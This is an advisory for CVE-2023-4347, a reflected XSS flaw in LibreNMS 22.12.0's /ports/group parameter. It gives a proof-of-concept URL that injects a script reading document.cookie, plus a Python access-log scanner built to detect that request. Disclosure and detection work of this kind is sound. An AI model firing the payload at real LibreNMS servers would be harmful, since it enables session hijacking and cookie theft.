
CVE-2023-4347 – LibreNMS

Reflected XSS

A reflected Cross-Site Scripting (XSS) vulnerability in LibreNMS 22.12.0 – Fri Dec 30 2022 10:11:51 GMT+0100 allows attackers to execute arbitrary external JavaScript code in the affected browser via the /ports/group parameter.

POC – Proof of concept

PAYLOAD: http://YOURSITE/ports/group=OOOOO%3C%2Fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
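
A log check for the request shape shown in the PoC, as an added example that is not part of the original advisory or of LibreNMS: it scans web-server access-log lines for a group= segment under /ports whose decoded value contains markup. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access-log line (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A "group=" segment under /ports, matched on the raw (still encoded) target.
GROUP_RE = re.compile(r"/ports(?:/[^?#\s]*)?[/?&]group=(?P<value>[^/?&#\s]*)", re.I)
SCRIPT_RE = re.compile(r"<\s*/?\s*script", re.I)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return None, 'markup' or 'script-tag' for one access-log line."""
    request = REQUEST_RE.search(line)
    group = GROUP_RE.search(request.group("target")) if request else None
    if not group:
        return None
    value = fully_decode(group.group("value"))
    if SCRIPT_RE.search(value):
        return "script-tag"
    return "markup" if ("<" in value or ">" in value) else None


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    verdicts = ((n, classify(line)) for n, line in enumerate(lines, start=1))
    return [(n, v) for n, v in verdicts if v]


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2023:10:00:00 +0000] "GET /ports/group=3 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Feb/2023:10:00:05 +0000] "GET /ports/group=OOOOO%3C%2Fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 5342',
    '192.0.2.12 - - [01/Feb/2023:10:00:09 +0000] "GET /ports/group=x%253Cb%253E HTTP/1.1" 200 5200',
    '192.0.2.13 - - [01/Feb/2023:10:00:12 +0000] "GET /devices/group=%3Cscript%3E HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

The value is extracted before decoding because the decoded payload contains a `/`, which would otherwise end the path segment early.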

Impact

This vulnerability allows attackers to hijack the user's current session, steal relevant information, deface the website, or direct users to malicious websites, and can be used by an attacker for further exploitation.

Severity

https://cvss.js.org/#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Reference

https://github.com/librenms/librenms

https://huntr.dev/bounties/1f78c6e1-2923-46c5-9376-4cc5a8f1152f/

https://nvd.nist.gov/vuln/detail/CVE-2023-4347